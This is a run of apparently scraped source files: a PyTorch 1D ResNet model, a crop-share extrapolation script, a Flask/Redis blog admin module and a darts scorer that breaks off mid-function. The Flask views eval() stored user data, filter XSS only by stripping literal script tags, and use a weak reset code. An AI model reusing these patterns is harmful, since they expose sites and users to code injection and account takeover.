self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n # Bottleneck in torchvision places the stride for downsampling at 3x3 convolution(self.conv2)\n # while original implementation places the stride at the first 1x1 convolution(self.conv1)\n # according to \"Deep residual learning for image recognition\"https://arxiv.org/abs/1512.03385.\n # This variant is also known as ResNet V1.5 and improves accuracy according to\n # https://ngc.nvidia.com/catalog/model-scripts/nvidia:resnet_50_v1_5_for_pytorch.\n\n expansion: int = 4\n\n def __init__(\n self,\n inplanes: int,\n planes: int,\n stride: int = 1,\n downsample: Optional[nn.Module] = None,\n groups: int = 1,\n base_width: int = 64,\n dilation: int = 1,\n norm_layer: Optional[Callable[..., nn.Module]] = None\n ) -> None:\n super(Bottleneck, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm1d\n width = int(planes * (base_width / 64.)) * groups\n # Both self.conv2 and self.downsample layers downsample the input when stride != 1\n self.conv1 = conv1x1(inplanes, width)\n self.bn1 = norm_layer(width)\n self.conv2 = conv3x3(width, width, stride, groups, dilation)\n self.bn2 = norm_layer(width)\n self.conv3 = conv1x1(width, planes * self.expansion)\n self.bn3 = norm_layer(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x: Tensor) -> Tensor:\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(\n self,\n block: Type[Union[BasicBlock, Bottleneck]],\n layers: List[int],\n num_classes: int = 3,\n zero_init_residual: bool = False,\n groups: int = 1,\n width_per_group: int = 64,\n replace_stride_with_dilation: Optional[List[bool]] = None,\n norm_layer: Optional[Callable[..., nn.Module]] = None\n ) -> None:\n super(ResNet, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm1d\n self._norm_layer = norm_layer\n\n self.inplanes = 64\n self.dilation = 1\n if replace_stride_with_dilation is None:\n # each element in the tuple indicates if we should replace\n # the 2x2 stride with a dilated convolution instead\n replace_stride_with_dilation = [False, False, False]\n if len(replace_stride_with_dilation) != 3:\n raise ValueError(\"replace_stride_with_dilation should be None \"\n \"or a 3-element tuple, got {}\".format(replace_stride_with_dilation))\n self.groups = groups\n self.base_width = width_per_group\n self.conv1 = nn.Conv1d(channel_size, self.inplanes, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = norm_layer(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool1d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2,\n dilate=replace_stride_with_dilation[0])\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2,\n dilate=replace_stride_with_dilation[1])\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2,\n dilate=replace_stride_with_dilation[2])\n self.avgpool = nn.AdaptiveAvgPool1d(1)\n self.fc = nn.Linear(512 * block.expansion, num_classes)\n self.softmax = nn.Softmax(dim=1)\n\n 
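# Kaiming-initialise convolutions; norm layers start at weight 1, bias 0\n for m in 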
self.modules():\n if isinstance(m, nn.Conv1d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm1d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0) # type: ignore[arg-type]\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0) # type: ignore[arg-type]\n\n def _make_layer(self, block: Type[Union[BasicBlock, Bottleneck]], planes: int, blocks: int,\n stride: int = 1, dilate: bool = False) -> nn.Sequential:\n norm_layer = self._norm_layer\n downsample = None\n previous_dilation = self.dilation\n if dilate:\n self.dilation *= stride\n stride = 1\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n norm_layer(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, self.groups,\n self.base_width, previous_dilation, norm_layer))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes, groups=self.groups,\n base_width=self.base_width, dilation=self.dilation,\n norm_layer=norm_layer))\n\n return nn.Sequential(*layers)\n\n def _forward_impl(self, x: Tensor) -> Tensor:\n # See note [TorchScript super()]\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.fc(x)\n x = self.softmax(x)\n\n return x\n\n def forward(self, x: Tensor) -> Tensor:\n return self._forward_impl(x)\n\n\nclass MPL(nn.Module):\n\n def __init__(\n self,\n num_classes: int = 3,\n zero_init_residual: bool = False,\n replace_stride_with_dilation: Optional[List[bool]] = None,\n norm_layer: Optional[Callable[..., nn.Module]] = None\n ) -> None:\n super(MPL, self).__init__()\n self.inplanes = 64\n\n self.conv1 = nn.Conv1d(channel_size, self.inplanes, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = nn.BatchNorm1d(self.inplanes)\n self.bn2 = nn.BatchNorm1d(self.inplanes)\n self.bn3 = nn.BatchNorm1d(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool1d(kernel_size=3, stride=2, padding=1)\n\n self.fc1 = nn.Linear(98, 50)\n self.fc2 = nn.Linear(50, 1)\n self.fc3 = nn.Linear(self.inplanes, num_classes)\n #self.fc3 = nn.Linear(64, num_classes)\n self.softmax = nn.Softmax(dim=1)\n\n for m in self.modules():\n if isinstance(m, nn.Conv1d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm1d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def _forward_impl(self, x: Tensor) -> Tensor:\n # See note [TorchScript super()]\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n #x = self.maxpool(x)\n\n x = self.fc1(x)\n #x = self.relu(x)\n x = self.fc2(x)\n #x = self.relu(x)\n x = torch.flatten(x,1)\n x = self.fc3(x)\n x = self.softmax(x)\n\n return x\n\n def forward(self, x: Tensor) -> Tensor:\n return self._forward_impl(x)\n\n\ndef _resnet(\n arch: str,\n block: 
Type[Union[BasicBlock, Bottleneck]],\n    layers: List[int],\n    pretrained: bool,\n    progress: bool,\n    **kwargs: Any\n) -> ResNet:\n    model = ResNet(block, layers, **kwargs)\n    if pretrained:\n        state_dict = load_state_dict_from_url(model_urls[arch],\n                                              progress=progress)\n        model.load_state_dict(state_dict)\n    return model\n\ndef mpl(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> MPL:\n    r\"\"\"Small Conv1d-plus-linear baseline (the MPL class above), exposed with the\n    same factory signature as the resnet builders.\n    Args:\n        pretrained (bool): accepted for signature compatibility, ignored\n        progress (bool): accepted for signature compatibility, ignored\n    \"\"\"\n    return MPL()\n\n\n\ndef resnet18(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:\n    r\"\"\"ResNet-18 model from\n    `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n    Args:\n        pretrained (bool): If True, returns a model pre-trained on ImageNet\n        progress (bool): If True, displays a progress bar of the download to stderr\n    \"\"\"\n    return _resnet('resnet18', BasicBlock, [2, 2, 2, 2], pretrained, progress,\n                   **kwargs)\n\n\ndef resnet34(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:\n    r\"\"\"ResNet-34 model from\n    `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n    Args:\n        pretrained (bool): If True, returns a model pre-trained on ImageNet\n        progress (bool): If True, displays a progress bar of the download to stderr\n    \"\"\"\n    return _resnet('resnet34', BasicBlock, [3, 4, 6, 3], pretrained, progress,\n                   **kwargs)\n\n\ndef resnet50(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:\n    r\"\"\"ResNet-50 model from\n    `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n    Args:\n        pretrained (bool): If True, returns a model pre-trained on ImageNet\n        progress (bool): If True, displays a progress bar of the download to stderr\n    \"\"\"\n    return _resnet('resnet50', Bottleneck, [3, 4, 6, 3], pretrained, progress,\n                   **kwargs)\n\n\ndef resnet101(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:\n    r\"\"\"ResNet-101 model from\n    `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n    Args:\n        pretrained (bool): If True, returns a model pre-trained on ImageNet\n        progress (bool): If True, displays a progress bar of the download to stderr\n    \"\"\"\n    return _resnet('resnet101', Bottleneck, [3, 4, 23, 3], pretrained, progress,\n                   **kwargs)\n\n\ndef resnet152(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:\n    r\"\"\"ResNet-152 model from\n    `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n    Args:\n        pretrained (bool): If True, returns a model pre-trained on ImageNet\n        progress (bool): If True, displays a progress bar of the download to stderr\n    \"\"\"\n    return _resnet('resnet152', Bottleneck, [3, 8, 36, 3], pretrained, progress,\n                   **kwargs)\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":19373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"357872309","text":"import pandas as pd\nimport numpy as np\nimport scipy.stats as stat\nimport matplotlib.pyplot as plt\nimport progressbar\nimport random\n\"\"\" calculates percentage crop contributions to human food consumption to 2050.\n\n    main function( path for input data,\n                   start year of extrapolated data,\n                   end year of extrapolated data,\n                   start of year of data file) \"\"\"\n\ndef main(in_str, start_yr, end_yr, data_start_yr, **kwargs):\n\n    # start year and end year in data\n    dat_start = start_yr - 
data_start_yr\n dat_end = end_yr - data_start_yr\n\n # reduction factor if exp used\n reduct_factor = 1.0/2.5\n for key, value in kwargs.items():\n if key == \"reduct_factor\":\n reduct_factor = value\n\n # crop percentages in (1970 - 2010)\n input = pd.read_csv(in_str)\n columns = input.columns.to_list()\n\n output = pd.DataFrame(columns = columns, index = np.arange(2000, 2051, 1))\n\n # array for error messages !!!(unused as of yet)!!!\n flags = []\n\n # normalise input to 100% if not\n for i in range(0, len(input)):\n sum = np.sum(input.iloc[i,:])\n if abs(sum - 1) > 0.0000001:\n for j in range(0, len(input.iloc[i,:])):\n input.iloc[i,j] = input.iloc[i,j]/sum\n\n # for each var determine 2050 value\n for j in range(0, len(input.iloc[0,:])):\n\n # linear trajectories\n lin_params = stat.linregress(np.arange(start_yr, end_yr + 1, 1), input.iloc[dat_start:dat_end+1,j])\n\n # if linear trajectory is < 0 by 2050, use exponential decay to 0.1 * 2010 value\n if lin_params[0] * 2050 + lin_params[1] < 0.0:\n flagstr = columns[j] + \" 2050 is less than 0.0%, using exponential decay\"\n flags.append(flagstr)\n start_val = lin_params[0] * 2010 + lin_params[1]\n end_val = start_val*reduct_factor\n exp_b = np.log(end_val/start_val) / (end_yr - start_yr)\n exp_a = start_val/np.exp(2010*exp_b)\n\n for i in range(0, 51):\n if i < 11:\n output.iloc[i, j] = lin_params[0] * (2000 + i) + lin_params[1]\n else:\n output.iloc[i, j] = exp_a * np.exp((i+2000)*exp_b)\n\n # if linear takes value to to > 0, ####################### FIX ME FIX ME - assess what is a reasonable max perc???\n elif lin_params[0] * 2050 + lin_params[1] > 100.0:\n flagstr = columns[j] + \" 2050 is greater than 100.0%, using exponential growth !!! FIX ME !!!\"\n flags.append(flagstr)\n start_val = lin_params[0] * 2010 + lin_params[1]\n end_val = 0.5\n exp_b = np.log(end_val / start_val) / (end_yr - start_yr)\n exp_a = start_val / np.exp( 2010 * exp_b)\n\n for i in range(0, 51):\n if i < 11:\n output.iloc[i, j] = lin_params[0] * (2000 + i) + lin_params[1]\n else:\n output.iloc[i, j] = exp_a * np.exp((i+2000)*exp_b)\n\n # otherwise just use linear\n else:\n for i in range(0, 51):\n output.iloc[i, j] = lin_params[0] * (2000 + i) + lin_params[1]\n\n # normalise output to 100\n for i in range(0, len(output)):\n sum = np.sum(output.iloc[i,:])\n if abs(sum - 1) > 0.0000001:\n for j in range(0, len(output.iloc[i,:])):\n output.iloc[i,j] = output.iloc[i,j]/sum\n\n for key, value in kwargs.items():\n if key == \"plot\" and value == True:\n\n def randcolor():\n color = (random.randint(30,80)/100, random.randint(10,100)/100, random.randint(30,80)/100)\n return color\n colors = []\n #colors = [\"#508d4e\", \"#6aae68\", \"#87dd84\", \"#bff6bd\", \"#a94b0c\", \"#ea650d\", \"#f2b287\", \"#db6c22\", \"#e5dbb0\", \"#8bc8df\", \"#cbcc99\"]\n for j in range(0, len(columns)):\n color = randcolor()\n colors.append(color)\n for j in range(0, len(columns)):\n plt.fill_between(np.arange(2000, 2051, 1), np.full((51), 1), np.sum(output.iloc[:, 0:j], axis=1), color = colors[j])\n plt.xlim(2000, 2050)\n plt.ylim(0,1)\n plt.legend(columns)\n plt.show()\n\n return output\n","sub_path":"perc_contributions.py","file_name":"perc_contributions.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"486234613","text":"# coding: UTF-8\nfrom flask import render_template, session, redirect, \\\n url_for,g,flash,request,current_app\nimport 
sys\n#sys.path.insert(0,r\"C:\\Users\\Administrator\\Desktop\\VPS\\myweb\")\nsys.path.insert(0,\"/var/www/FlaskApp\")\nfrom redis import Redis\nfrom datetime import datetime\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField,PasswordField\nfrom wtforms.validators import Required,Regexp,Email,EqualTo\nfrom flask_mail import Message\nfrom werkzeug.security import generate_password_hash\nfrom threading import Thread\nimport lxml.etree as etree\nimport random, re\nfrom FlaskApp import pool,mail\nfrom . import admin\n\nMESSAGES_PER_PAGE=10 # messages per page\nCOMMENTS_PER_PAGE=10 # comments per page\nARTICLES_PER_PAGE=10 # articles per page\n\nclass ChangeForm(FlaskForm):# password-recovery form\n    catch=StringField('请输入验证码', validators=[Required()])\n    password=PasswordField('密码', validators=[Regexp('[a-zA-Z\\d]{6,}',message='密码只包含数字和字母且不少于6位'),EqualTo('password1', message='两次密码要相同')])\n    password1=PasswordField('确认密码')\n    submit = SubmitField('Submit')\n\nclass MailForm(FlaskForm):\n    name=StringField('请输入用户名', validators=[Required()])\n    email=StringField('请输入注册时的邮箱', validators=[Required(),Email(message='邮箱格式不正确')])\n    submit = SubmitField('下一步')\n\n\n@admin.before_request\ndef before_request():# open a database connection\n    g.db=Redis(connection_pool=pool)\n    \n@admin.teardown_request\ndef teardown_request(exception):# release the database connection\n    if getattr(g,'db',None):\n        del g.db\n\n\n@admin.route('/')# view your own homepage\n@admin.route('/<user>')# view another user's homepage (their comments are not shown)\ndef manage(user=None): # management homepage: articles plus comments\n    if (not session.get('login'))or(not session.get('name')):\n        flash('没有登录')\n        return redirect(url_for('main.index'))\n    if user:\n        a=get_articles(g.db,user)\n        count=len(g.db.zrevrange('articles:'+user,0,-1))\n    else:\n        a=get_articles(g.db,session.get('name'))\n        count=len(g.db.zrevrange('articles:'+session.get('name'),0,-1))\n    return render_template('admin/manage.html',\n        name=session.get('name'),login=session.get('login'),user=user,\n        a=a,current_time=datetime.utcnow(),count=count,image=session.get('image_url'))\n\n\n@admin.route('/message/') # @-mentions from other users\ndef message():\n    if (not session.get('login'))or(not session.get('name')):\n        flash('没有登录')\n        return redirect(url_for('main.index'))\n    name=session.get('name')\n    g.db.set(name+':mes_count',0)\n    a=[]\n    mes=g.db.zrevrange(name+':messages',0,10)\n    for i in mes:\n        new=dict()\n        try:\n            new['article']=article_id=g.db.hget(i,'article').decode('utf-8')\n            new['title']=g.db.hget(article_id,'title').decode('utf-8')\n        except:\n            g.db.zrem(name+':messages',i)\n            g.db.delete(i)\n            continue\n        new['user']=g.db.hget(i,'user').decode('utf-8')\n        new['time']=g.db.hget(i,'time').decode('utf-8')\n        if g.db.hget(i,'touser'):\n            new['to']=g.db.hget(i,'touser').decode('utf-8')\n        a.append(new)\n    return render_template('admin/messages.html',login=True,name=name,a=a,current_time=datetime.utcnow(),image=session.get('image_url'))\n\n@admin.route('/get_mes_count',methods=['POST'])\ndef get_mes_count():\n    if (not session.get('login'))or(not session.get('name')):\n        return ''\n    count=g.db.get(session.get('name')+':mes_count')\n    if count:\n        count=count.decode('utf-8')\n        return count\n    else:\n        return ''\n    \n@admin.route('/<user>/<article_id>/')# detailed content of one article\ndef detail(user,article_id):\n    if not session.get('login'):\n        flash('没有登录')\n        return redirect(url_for('main.index'))\n    content=g.db.hgetall(article_id)\n    new=dict()\n    for key,value in content.items():\n        new[key.decode('utf-8')]=value.decode('utf-8')\n    #new['time']=new.get('time').split('.')[0]\n    new['type']=eval(new['type'])\n    new['id']=article_id\n    pos=g.db.zrevrank('articles:'+user,article_id)\n    if not isinstance(pos,int):\n        up=None\n        down=None\n    
else:\n        if(pos==0):\n            up=None\n            down=g.db.zrevrange('articles:'+user,pos+1,pos+2)\n            if down:\n                down=down[0]\n        else:\n            up=g.db.zrevrange('articles:'+user,pos-1,pos)\n            down=g.db.zrevrange('articles:'+user,pos+1,pos+2)\n            if down:\n                down=down[0]\n            if up:\n                up=up[0]\n    u=g.db.smembers('user:')\n    s=[]\n    for i in u:\n        s.append(i.decode('utf-8'))\n    return render_template('admin/detail.html',\n        name=session.get('name'),login=session.get('login'),\n        a=new,current_time=datetime.utcnow(),up=up,down=down,user=user,s=s,image=session.get('image_url'))\n    \n    \n    \n\ndef get_articles(db,name):# fetch the first page of articles\n    articles=db.zrevrange('articles:'+name,0,-1)\n    a=[]\n    if len(articles)>ARTICLES_PER_PAGE:\n        articles=articles[0:ARTICLES_PER_PAGE]\n    for article in articles:\n        b=[]\n        content=db.hgetall(article)\n        new=dict()\n        for key,value in content.items():\n            new[key.decode('utf-8')]=value.decode('utf-8')\n        #new['time']=new.get('time').split('.')[0]\n        new['type']=eval(new['type'])\n        new['summary']=summary(etree.HTML(new.get('text')).xpath('//text()'))\n        if(new):\n            b.append(article)\n            b.append(new)\n            a.append(b)\n    \n    return a\n    \n@admin.route('/change/<article_id>')# edit an article\ndef change(article_id):\n    if (not session.get('login'))or(not session.get('name')):\n        flash('没有登录')\n        return redirect(url_for('main.index'))\n    content=g.db.hgetall(article_id)\n    name=content[b'poster'].decode('utf-8')\n    title=content[b'title'].decode('utf-8')\n    text=content[b'text'].decode('utf-8')\n    if (session.get('name')==name):\n        return render_template('edit/change.html',text=text,article_id=article_id,title=title,\n            login=session.get('login'),name=session.get('name'),image=session.get('image_url'))\n    else:\n        return redirect(url_for('main.index'))\n    \n@admin.route('/savechange',methods=['POST'])# save article edits\ndef savechange():\n    if (not session.get('login'))or(not session.get('name')):\n        flash('没有登录')\n        return redirect(url_for('main.index'))\n    article_id=request.form.get('article_id')\n    content=g.db.hgetall(article_id)\n    name=content[b'poster'].decode('utf-8')\n    text=re.sub(r'<script>|</script>','js',request.form.get('text'))\n    if (session.get('name')==name):\n        g.db.hset(article_id,'text',text)\n    return redirect(url_for('admin.manage'))\n    \n\n\n@admin.route('/del/<article_id>',methods=['POST'])# delete an article\ndef delete(article_id):\n    if (not session.get('login'))or(not session.get('name')):\n        flash('没有登录')\n        return redirect(url_for('main.index'))\n    content=g.db.hgetall(article_id)\n    name=content[b'poster'].decode('utf-8')\n    typ=eval(content[b'type'].decode('utf-8'))\n    if (session.get('name')==name):\n        comments=g.db.zrange(article_id+':comments',0,-1)\n        for i in comments:\n            g.db.delete(i)\n        g.db.delete(article_id+':comments')\n        g.db.zrem('time:',article_id) \n        g.db.zrem('articles:'+name,article_id)\n        for ty in typ:\n            g.db.zrem('articles:'+ty+':',article_id)\n        g.db.delete(article_id)\n    return 'ok'\n\n@admin.route('/page_articles/<int:page>')# paginated article content\ndef page_articles(page):\n    if page<2:\n        return ''\n    if session.get('login'):\n        if request.args['user']!='None':\n            name=request.args['user']\n        else:\n            name=session.get('name')\n        start=(page-1)*ARTICLES_PER_PAGE\n        end=start+ARTICLES_PER_PAGE-1\n        articles=g.db.zrevrange('articles:'+name,start,end)\n        a=[]\n        for article in articles:\n            b=[]\n            content=g.db.hgetall(article)\n            new=dict()\n            for key,value in content.items():\n                new[key.decode('utf-8')]=value.decode('utf-8')\n            #new['time']=new.get('time').split('.')[0]\n            new['type']=eval(new['type'])\n            new['summary']=summary(etree.HTML(new.get('text')).xpath('//text()'))\n            if(new):\n                b.append(article)\n                b.append(new)\n                a.append(b)\n        
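# Illustrative sketch (hypothetical input; only lxml.etree, already imported above, is assumed): summary() joins the text nodes that xpath('//text()') pulls out of the stored HTML, stopping once about 50 characters are collected, which is how the article previews above are built.\n#\n#     import lxml.etree as etree\n#     html = '<p>Hello <b>world</b>, this is the body of a post.</p>'\n#     text_nodes = etree.HTML(html).xpath('//text()')\n#     print(''.join(text_nodes)[:50])  # -> 'Hello world, this is the body of a post.'\n        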
return render_template('admin/page_articles.html',a=a,name=session.get('name'))\n    else:\n        return ''\n\n# change password \n@admin.route('/forget/begin/',methods=['GET','POST']) \ndef forget_begin():\n    form=MailForm()\n    if form.validate_on_submit():\n        if g.db.sismember('mail:',form.email.data) and g.db.sismember('user:',form.name.data):\n            recipients=[]\n            recipients.append(form.email.data)\n            letter='abcdefghijklm012345nopqrstuvwxy6789z'\n            catch=random.choice(letter)+random.choice(letter)+random.choice(letter)+random.choice(letter)+random.choice(letter)\n            g.db.set('user:'+form.name.data+':forget',catch)\n            g.db.expire('user:'+form.name.data+':forget',300)\n            session['name']=form.name.data\n            send_mail(catch,recipients)\n            session['r']=True\n            flash('请检查邮件中的验证码')\n        return redirect(url_for('.forget_next'))\n    else:\n        return render_template('admin/forget1.html',form=form)\n\n@admin.route('/forget/next/',methods=['GET','POST'])\ndef forget_next():\n    form=ChangeForm()\n    if form.validate_on_submit():\n        if not session.get('r'):\n            flash('修改失败')\n            return redirect(url_for('main.index'))\n        catch=g.db.get('user:'+session['name']+':forget')\n        if catch:\n            if catch.decode('utf-8')==form.catch.data:\n                g.db.hset('user:'+session['name'],'password',generate_password_hash(form.password.data))\n                g.db.save()\n                flash('修改成功')\n            else:\n                flash('验证码错误')\n                return redirect(url_for('.forget_next'))\n        else:\n            flash('修改失败')\n        return redirect(url_for('main.index'))\n    else:\n        return render_template('admin/forget1.html',form=form)\n\n# manage comments\n'''\n@admin.route('/comments/')\ndef mycomments():\n    if not session.get('login') or not session.get('name'):\n        return redirect(url_for('main.index'))\n    count=len(g.db.zrevrange(session.get('name')+':comments',0,-1))\n    comments=g.db.zrevrange(session.get('name')+':comments',0,COMMENTS_PER_PAGE-1)\n    a=[]\n    for i in comments:\n        com=g.db.hgetall(i)\n        if not com:\n            g.db.zrem(session.get('name')+':comments',i)\n            continue\n        new=dict()\n        for key,value in com.items():\n            new[key.decode('utf-8')]=value.decode('utf-8')\n        try:\n            new['title']=g.db.hget(new['article'],'title').decode('utf-8')\n        except:\n            #g.db.zrem(session.get('name')+':comments',com)\n            new['title']='该文章已被删除'\n        a.append(new)\n    return render_template('admin/comments.html',a=a,current_time=datetime.utcnow(),count=count,name=session.get('name'),login=session.get('login'),image=session.get('image_url'))\n\n'''\n@admin.route('/comments/<int:page>')# paginated comments\ndef page_mycomments(page):\n    if not session.get('login') or not session.get('name'):\n        return ''\n    if page<1:\n        return ''\n    start=(page-1)*COMMENTS_PER_PAGE\n    end=start+COMMENTS_PER_PAGE-1\n    comments=g.db.zrevrange(session.get('name')+':comments',start,end)\n    a=[]\n    for i in comments:\n        com=g.db.hgetall(i)\n        if not com:\n            g.db.zrem(session.get('name')+':comments',i)\n            continue\n        new=dict()\n        for key,value in com.items():\n            new[key.decode('utf-8')]=value.decode('utf-8')\n        try:\n            new['title']=g.db.hget(new['article'],'title').decode('utf-8')\n        except:\n            #g.db.zrem(session.get('name')+':comments',i)\n            g.db.delete(i)\n            new['title']='该文章已被删除'\n            a.append(new)\n        else:\n            a.append(new)\n    return render_template('admin/page_comments.html',a=a)\n\n# password recovery sends a verification e-mail, asynchronously\ndef send_async_email(app, msg):\n    with app.app_context():\n        mail.send(msg)\n\ndef send_mail(catch,recipients):\n    app = current_app._get_current_object()\n    msg = Message(subject=\"修改密码\", sender='2452559168@qq.com', recipients=recipients)\n    msg.html =render_template('admin/email.html',catch=catch)\n    thr = Thread(target=send_async_email, args=[app, msg])\n    thr.start()\n    
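# Hypothetical usage sketch for the helper above (assumes a request context so current_app is bound): send_mail() returns the started Thread, and send_async_email() re-enters app.app_context() because Flask-Mail needs the application's configuration outside the request thread.\n#\n#     catch = 'a3k9z'                               # one-time code, as in forget_begin()\n#     thr = send_mail(catch, ['user@example.org'])  # returns immediately\n#     thr.join()                                    # only in tests, to wait for delivery\n    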
return thr\n\ndef summary(l):\n s=''\n for i in l:\n s+=i\n if(len(s)>50):\n break\n return s\n\n\n","sub_path":"admin_bp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"308189520","text":"import constants as con\nfrom general_use_functions import *\n\n\ndef create_players(number_of_players):\n # taking users number of players and creating them\n if number_of_players > 0:\n for i in range(number_of_players):\n new_player = input(\"Podaj nazwię gracza %d: \" % (i + 1))\n score_board.update({new_player: con.start_points_std})\n else:\n print(\"Nieprawidłowa ilość graczy.\")\n\n\ndef player_name(number_of_player):\n # get player name\n name_list = list(score_board.keys())\n return name_list[number_of_player - 1]\n\n\ndef player_score(number_of_player):\n # get player score\n points_list = list(score_board.values())\n return points_list[number_of_player - 1]\n\n\ndef end_check(player):\n # check if players properly ends game according to rules of dart\n while True:\n temp_command = input(\"Czy wynik wyzerowany double'm ? Y/N\\n\").lower()\n if temp_command == \"y\":\n print(f\"\\nGratulacje !\\nWygrał {player}.\")\n exit_protocol()\n elif temp_command == \"n\":\n return None\n else:\n print(\"Nieprawidłowa komenda.\")\n continue\n\n\ndef player_hint(temp_score):\n # gives ending hints for players - which points score to end game\n score = possible_score_standard()\n score.sort(reverse=True)\n score = [0] + score\n hint = []\n for i in score:\n for j in score:\n for k in score:\n if (k % 2 == 0 and k <= 40 and k != 0) and i + j + k == temp_score:\n if i != 0:\n hint.append(hint_parts(i)[0])\n if j != 0:\n hint.append(hint_parts(j)[0])\n return hint + [f'D{int(k / 2)}']\n elif k == 50 and i + j + k == temp_score:\n if i != 0:\n hint.append(hint_parts(i)[0])\n if j != 0:\n hint.append(hint_parts(j)[0])\n return hint + ['DB']\n\n\ndef hint_parts(d):\n # get prefix of hint numbers (single, double, triple, single/double bull)\n hint = []\n if d <= 20:\n hint.append(f'S{d}')\n if d <= 40 and d % 2 == 0:\n hint.append(f'D{int(d / 2)}')\n if d <= 60 and d % 3 == 0:\n hint += [f'T{int(d / 3)}']\n if d == 50:\n hint += ['DB']\n if d == 25:\n hint += ['SB']\n return hint\n\n\ndef throw(number_of_player):\n # score counting and program behaviour while rounds/throws\n player = player_name(number_of_player)\n temp_score = player_score(number_of_player)\n throws = 0\n while throws < 3:\n try:\n command = input(f\"{player} - rzut {throws + 1}: \").lower()\n throw_score = int(command)\n # if throw score is possible to get\n if int(throw_score) in possible_score_standard():\n if temp_score > 0:\n throws += 1\n points_left = temp_score - throw_score\n temp_score = points_left\n if temp_score == 0:\n if end_check(player) is None:\n throws = 3\n temp_score = player_score(number_of_player)\n continue\n if temp_score < 1:\n throws = 3\n temp_score = player_score(number_of_player)\n print(\"FURAAA !\")\n continue\n else:\n print(f\"Punkty: {temp_score}\")\n if player_hint(temp_score) is None:\n pass\n else:\n print(*player_hint(temp_score), sep=\", \")\n continue\n else:\n print(con.wrong_throw)\n continue\n # different user commends or ValueError\n except ValueError:\n # giving user possibility to exit or reset round\n if command == \"exit\":\n exit_protocol()\n elif command == \"hard reset\":\n throws = 0\n temp_score = player_score(number_of_player)\n print(\"Runda zresetowana.\")\n 
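# Hypothetical calls to the hint helpers defined above: hint_parts() lists the single/double/triple (and bull) ways to score d, and player_hint() combines such parts so the final dart is always a double, as the checkout rules require.\n#\n#     print(hint_parts(18))   # -> ['S18', 'D9', 'T6']\n#     print(hint_parts(32))   # -> ['D16']  (a legal double-out)\n#     print(hint_parts(50))   # -> ['DB']   (double bull)\n                    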
